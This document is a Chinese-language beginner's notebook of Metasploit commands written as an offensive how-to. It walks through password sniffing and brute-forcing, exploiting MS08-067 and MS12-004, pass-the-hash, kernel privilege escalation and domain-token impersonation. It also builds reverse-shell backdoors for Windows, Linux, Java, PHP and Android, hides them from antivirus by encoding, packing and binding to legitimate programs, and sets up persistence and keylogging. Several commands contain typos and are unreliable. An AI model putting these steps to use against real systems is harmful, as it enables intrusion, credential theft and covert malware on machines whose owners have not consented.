小白笔记-----------------------Metasploit (from tools)整理

笪健
2023-12-01
1、msf更新
命令:./msfupdate
2、nmap扫描
命令:nmap命令
3、msf内置扫描
命令:search portscan
之后调用
show options 显示设置参数
4、msf SMB获取系统信息
命令:use auxiliary/scanner/smb/smb_version
5、msf服务识别
命令:ssh:
    use auxiliary/scanner/ssh/ssh_version
      ftp:
    use auxiliary/scanner/ftp/ftp_version
6、密码嗅探
命令: ftp密码嗅探:
        use auxiliary/sniffer/psnuffle
7、snmp扫描
命令:search snmp
    use 其中一个
    show options
    完成设置
    snmp枚举:
    use auxiliary/scanner/snmp/snmp_enum
8、SMB登陆验证(microsoft 网络共享协议)
命令:use auxiliary/scanner/smb/smb_lo
9、VNC身份识别(远程控制)
命令:
     use auxiliary/scanner/vnc/vnc_none_auths
10、wmap web扫描
命令:load wmap
    wmap_sites
    查看参数
    wmap_sites -l
    查看结果
    wamp_targets -h
    设置参数
    wmap_targets -l
    查看结果
    wmap_run -h
    wmap_run -t (进行扫描)
    wmap_run -e (进行测试)
    查看扫描结果
    wmap_vulns -l
11、远程代码执行
漏洞:MS08_067
命令:search 08_067
    use exploit/windows/smb/ms08_067_netapi
    设置参数,选择载荷
    set paload reverse_tcp(非常常用的载荷)
    设置目标版本号
    set target
12、MIDI文件解析远程代码执行
漏洞:ms12_004
命令:use (调用一下)
    show options
    exploit (生成url)
    set url(修改url)
    让对方访问url
    sessions(查看会话)
    sessions -i 1(获得会话)
13、口令安全
命令:search mysql_login(mysql 服务)
    use
    show options
    set USERNAME
    set PASS_FILE
    search ssh_login(ssh 服务)
    操作类似

14、Hash值传递参数
命令:在不知道密码的情况下:
    知道密码的情况下;
    use exploit/windows/smb/psexec
    进行设置
    exploit
    hashdump(获取hash值)
    set smbpass +hash值(可以直接用hash值登陆)
15、NDProxy内核提权
命令:建立会话之后
    search ms14_002
    用这个漏洞提升自己的权限
    set session 1
    exploit 攻击
16、多种后门生成
命令:主要是用payloads
    msfpayload windows/meterpreter/reverse_tcp LHOST= **** LPORT=*** x
    >/ ***.exe
    生成了后门
将后门放到目标机器中
    在msf中有一个监听的程序
    search handler
    use exploit/multi/handler
    show options
    set payload 设置刚刚的payload     windows/meterpreter/reverse_tcp
    配置一下参数,设置端口和ip
    在目标机子上运行后门,反弹一个shell
linux后门:
    msfpayload linux/x86/shell_reverse_tcp LHOST=**
LPORT=*** x>linux
    给他权限,
    ./linux
    同时还要监听相应的端口
生成java后门:
     msfpayload java/meterpreter/reverse_tcp LHOST=** LPORT=**
    w>123.jar
生成php后门:
    msfpayload php/meterpreter/reverse_tcp LHOST=*** LPORT=**
R | msfencode -e php/base64 -t raw -o 1.php
生成android后门:
    msfpayload android/meterpreter/reverse_tcp LHOST=*8 LPORT=**
    R>1.apk
17、内网渗透
命令:获得shell
    扫描c段
    run get_local_subnets
    查看域环境
    use incognito
    list_tokens -u
    impersonate_token (获得域管理的权限)
    shell(进入域管理shell)
    如果没有域管理
18、反反病毒(免杀)
    1、加壳
    2、用汇编的方法改变
命令:    先生成后门
    msfpayload windows/shell/reverese_tcp LHOST=** LPORT=**
    R | msfencode -e x86/shikata_ga_nai -t exe >123.exe
    用编码的方式来免杀
    调用多个编码进行多次免杀
    msfencode -L(查看可用编码,有的编码可以重复使用)
    msfpayload windows/meterprter/reverse_tcp LHOST=** LPORT=**
    R | msfencode -e x86/shikata_ga_nai -c 10 -t exe>123.exe
    绑定正常文件
    msfpayload windows/shell/reverese_tcp LHOST=** LPORT=**
    R | msfencode -e x86/shikata_ga_nai -t exe -x /root/ftp.exe -o 123.exe
    加壳
    upx - 5 /123.exe
19、XSS
命令:    search keylogger
    use 其中一个
    set DEMO true
    set URLPATH
    set srvport
20、维持访问(后门)
命令: 有一个会话
    run metsvc -A
    use exploit/multi/handler
    set payload windows/metsvc_bind_tcp
    实现主动连接
    keyscan_start (键盘记录)
    keyscan_dump           
 类似资料: